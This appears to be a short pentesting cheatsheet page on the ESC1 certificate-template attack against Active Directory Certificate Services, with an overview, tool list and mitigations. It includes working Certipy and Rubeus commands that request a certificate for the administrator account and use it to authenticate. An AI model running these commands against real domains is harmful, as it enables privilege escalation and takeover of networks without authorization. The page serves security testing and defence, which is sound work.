Back to Active Directory

Esc1

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

ESC1 (Certificate Service ESC1) is an ADCS attack where a certificate template allows the requester to specify the Subject Alternative Name (SAN). An attacker can request a certificate with their own account but specify a privileged user's UPN in the SAN.

This allows authentication as the privileged user using the forged certificate via PKINIT.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Esc1:

certipy find -u user@domain.local -p 'password' -dc-ip 10.10.10.10 -vulnerable
certipy req -u user@domain.local -p 'password' -ca 'CA-NAME' -target 'CA.domain.local' -template 'VulnerableTemplate' -upn 'administrator@domain.local'
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /ptt

Tools & Techniques

Recommended tools for Esc1:

  • Certipy: ADCS exploitation toolkit
  • Certify: .NET ADCS enumeration and exploitation
  • PSPKIAudit: PowerShell ADCS auditing
  • Identifies: templates with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag

Prevention & Mitigation

Security recommendations to prevent Esc1:

  • Disable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on certificate templates
  • Require Manager Approval for certificate enrollment
  • Enable CA audit logging and monitor for anomalous enrollments
  • Use secure enrollment agent certificates

References

Additional resources: